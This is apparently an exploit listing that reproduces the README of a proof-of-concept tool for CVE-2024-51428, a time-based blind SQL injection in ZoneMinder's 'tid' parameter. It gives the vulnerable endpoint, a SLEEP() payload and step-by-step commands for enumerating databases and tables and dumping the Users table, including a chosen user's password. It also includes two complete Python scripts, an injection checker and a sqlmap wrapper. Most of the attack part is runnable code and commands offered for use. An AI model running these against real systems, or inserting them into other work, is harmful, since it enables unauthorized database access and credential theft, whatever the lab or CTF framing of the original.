## https://sploitus.com/exploit?id=B0CE62B6-6B59-5808-9FB0-3B603895DEA0
# CVE-2024-51428 - ZoneMinder Blind SQL Injection PoC
Python wrapper for **sqlmap** designed to exploit **CVE-2024-51428** in ZoneMinder.
This tool automates detection and exploitation of a **Blind SQL Injection** vulnerability while keeping the output clean and focused on useful data.
The script hides sqlmap logs and only displays relevant information such as:
- Detected injection point
- Database names
- Tables
- Dumped credentials or sensitive data
This makes the tool ideal for **CTF environments, demonstrations, and security testing**.
---
## Vulnerability Overview
**CVE:** CVE-2024-51428
**Type:** Blind SQL Injection
**Affected Software:** ZoneMinder
**Attack Vector:** HTTP GET parameter
**Parameter:** `tid`
The vulnerability exists in the following endpoint:
```
/zm/index.php?view=request&request=event&action=removetag&tid=
```
The `tid` parameter is used in a database query without proper sanitization, so an attacker who holds a valid ZoneMinder session can inject SQL into that query.
Because the page gives no visible feedback from the query, the exploitation technique is **time-based blind SQL injection**: the injected SQL makes the database pause, and the delay in the HTTP response is the only signal an attacker gets back.
Example payload discovered by sqlmap:
```sql
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)
```
If the injected `SLEEP(5)` is executed, the response arrives about five seconds later than a request with `tid=1` alone. That delay, not anything in the response body, confirms the presence of SQL injection.
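The timing check above can be reproduced without sqlmap. The following is an added example, not code from the PoC repository: it sends a baseline request and a `SLEEP()` probe of the shape sqlmap reported, and only reports injection when every probe is roughly `delay` seconds slower than a fresh baseline, so one slow response from a busy host is not mistaken for a hit. The host, the cookie value, the 5-second delay and the helper names are assumptions for illustration.

```python
import time
import urllib.error
import urllib.parse
import urllib.request

# Constructed for this example: the vulnerable endpoint from the overview above.
ENDPOINT = "/zm/index.php"
BASE_PARAMS = {"view": "request", "request": "event", "action": "removetag"}


def build_url(base, tid_value):
    """Assemble the removetag request with an arbitrary tid value."""
    params = dict(BASE_PARAMS, tid=tid_value)
    return base.rstrip("/") + ENDPOINT + "?" + urllib.parse.urlencode(params)


def sleep_payload(delay):
    """Time-based probe in the same shape sqlmap reported for this CVE."""
    return "1 AND (SELECT 1 FROM (SELECT(SLEEP(%d)))x)" % delay


def http_probe(base, cookie, timeout=30):
    """Return a function that times one GET carrying the ZMSESSID cookie."""
    def probe(tid_value):
        req = urllib.request.Request(build_url(base, tid_value))
        req.add_header("Cookie", "ZMSESSID=" + cookie)
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # an error page still took as long as the query did
        return time.monotonic() - start
    return probe


def is_time_based_injectable(probe, delay=5, rounds=2):
    """Report injection only if every SLEEP probe is ~delay slower than baseline.

    `probe(tid_value)` must return the response time in seconds. Each round
    takes a fresh baseline, so a single slow response on a loaded host is
    not mistaken for SLEEP() firing.
    """
    for _ in range(rounds):
        baseline = probe("1")
        slow = probe(sleep_payload(delay))
        if slow - baseline < delay * 0.8:
            return False
    return True


if __name__ == "__main__":
    import sys
    base, cookie = sys.argv[1], sys.argv[2]   # e.g. http://target.htb COOKIE
    vulnerable = is_time_based_injectable(http_probe(base, cookie))
    print("[+] tid is time-based blind injectable" if vulnerable
          else "[-] no timing difference observed")
```

Run it as `python3 check.py http://target.htb '<ZMSESSID value>'` against a host you are authorized to test. The probe function is passed in rather than called directly so the decision logic can be exercised offline with a stub that returns fixed timings.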
---
## Features
- Automatic **Blind SQL Injection detection**
- Database enumeration
- Table enumeration
- Table dumping
- Column filtering
- Row filtering
- Clean output (sqlmap logs hidden)
- Designed for **CTF and pentesting labs**
---
## Requirements
- Python 3
- sqlmap
Install sqlmap if needed:
```bash
sudo apt install sqlmap
```
---
## Usage
Basic syntax:
```bash
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID value>'
```
> Run without any enumeration options, this command only checks whether the target is vulnerable.
Example:
```bash
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'
```
---
## Getting the Required Cookie
The exploit requires a valid ZoneMinder session cookie.
Steps:
1. Open the target in your browser
2. Open Developer Tools
3. Navigate to:
```
Application → Cookies
```
4. Locate the cookie named:
```
ZMSESSID
```
5. Copy its value and use it with `-c`
Example:
```bash
-c '151fvdqmjkhnkfat7l5epgmd22'
```
---
## Checking if the Target is Vulnerable
```bash
python3 poc.py --url http://target.htb -c 'COOKIE'
```
Example output:
```
[*] Checking vulnerability...
Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))
[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION
```
---
## Enumerating Databases
```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d
```
Example output:
```
available databases [3]:
information_schema
mysql
zm
```
---
## Enumerating Tables
```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm
```
Example output:
```
Database: zm
Users
Events
Monitors
Storage
```
---
## Dumping a Table
```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users
```
---
## Dumping a Specific Column
```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username
```
Example:
```
+----------+
| Username |
+----------+
| admin |
| viewer |
+----------+
```
---
## Filtering Rows (WHERE clause)
You can filter rows using:
```bash
-ff
```
Example:
```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -ff Username mark
```
Equivalent SQL:
```sql
WHERE Username='mark'
```
---
## Dumping Password for a Specific User
Example:
```bash
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark
```
Internal sqlmap command (the `-u`, `--cookie` and technique options come from the steps described under "How the Tool Works" below):
```bash
sqlmap -u "http://target.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
  --cookie="ZMSESSID=COOKIE" --technique=T --threads=10 --batch \
  -D zm -T Users -C Password --where="Username='mark'" --dump
```
---
## How the Tool Works
The script acts as a wrapper around sqlmap.
Steps performed internally:
1. Build the vulnerable endpoint
```
/zm/index.php?view=request&request=event&action=removetag&tid=1
```
2. Pass the authentication cookie to sqlmap
3. Execute sqlmap with the following options:
```
--threads=10
--technique=T
--batch
```
   Note that `--threads=10` has no effect here: sqlmap switches multi-threading off for time-based data retrieval (it warns that multi-threading is considered unsafe in time-based mode), so with `--technique=T` every extracted bit costs at least one delayed request. `--batch` answers sqlmap's interactive prompts with their defaults so the wrapper never blocks waiting for input.
4. Parse sqlmap output in real time
5. Filter out logs and display only:
- injection information
- databases
- tables
- dumped data
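The steps above, and the `-ff` to `--where` mapping from "Filtering Rows", can be written as a small wrapper of the same shape. This is an added example, not the PoC's own source: it maps the wrapper's options onto sqlmap's real flags (`-u`, `--cookie`, `--technique`, `--batch`, `--dbs`, `--tables`, `-D`, `-T`, `-C`, `--where`, `--dump`), and filters sqlmap's timestamped log lines out of the output as they arrive. Passing the cookie as `ZMSESSID=<value>`, the helper names and the exact filtering rule are assumptions.

```python
import re
import subprocess
import sys

# Vulnerable endpoint from "How the Tool Works" (tid=1 is the injection point).
VULN_PATH = "/zm/index.php?view=request&request=event&action=removetag&tid=1"

# sqlmap log lines start with a timestamp and level, e.g. "[12:00:01] [INFO] ...";
# result lines (parameter summary, database lists, dump tables) do not.
LOG_LINE = re.compile(r"^\[\d\d:\d\d:\d\d\] \[[A-Z]+\]")


def build_sqlmap_args(base_url, cookie, db=None, table=None, column=None, where=None):
    """Map the wrapper's -d/-db/-t/-f/-ff options onto sqlmap's flags."""
    args = [
        "sqlmap", "-u", base_url.rstrip("/") + VULN_PATH,
        "--cookie=ZMSESSID=" + cookie,   # assumption: cookie name from the README
        "--technique=T",                 # time-based blind only
        "--batch",                       # never block on interactive questions
    ]
    # --threads=10 is left out on purpose: sqlmap disables multi-threading for
    # time-based retrieval, so the option would not speed anything up.
    if db is None:
        args.append("--dbs")                    # -d          -> list databases
    elif table is None:
        args += ["-D", db, "--tables"]          # -d -db zm   -> list tables
    else:
        args += ["-D", db, "-T", table]         # -t Users    -> dump a table
        if column:
            args += ["-C", column]              # -f Password -> one column
        if where:
            col, value = where                  # -ff Username mark
            # Double any apostrophe so the value cannot break the WHERE clause.
            args.append("--where=%s='%s'" % (col, value.replace("'", "''")))
        args.append("--dump")
    return args


def keep_results(lines):
    """Drop sqlmap's timestamped log lines and blank lines; keep the rest."""
    return [line.rstrip() for line in lines
            if line.strip() and not LOG_LINE.match(line)]


def run(args):
    """Run sqlmap and echo only result lines as they arrive."""
    proc = subprocess.Popen(args, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, text=True)
    for line in proc.stdout:
        for kept in keep_results([line]):
            print(kept, flush=True)
    return proc.wait()


if __name__ == "__main__":
    # Usage: python3 wrapper.py http://target.htb COOKIE [db [table [column]]]
    base, cookie, rest = sys.argv[1], sys.argv[2], sys.argv[3:6]
    sys.exit(run(build_sqlmap_args(base, cookie, *rest)))
```

Because sqlmap prints its findings without the `[hh:mm:ss] [LEVEL]` prefix, filtering on that prefix alone keeps the `Parameter: tid (GET)` summary, the `available databases` list and the dump tables while hiding the progress chatter; anything sqlmap writes to stderr is merged into the same stream so it is filtered the same way.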
---
## Intended Use
This tool was created for:
- Capture The Flag challenges
- Security research
- Educational purposes
- Pentesting labs
---
## Disclaimer
This project is provided for educational and authorized security testing purposes only.
The author is not responsible for any misuse of this tool.
Always obtain proper authorization before testing any system.
---
## Author
Security Research / CTF tooling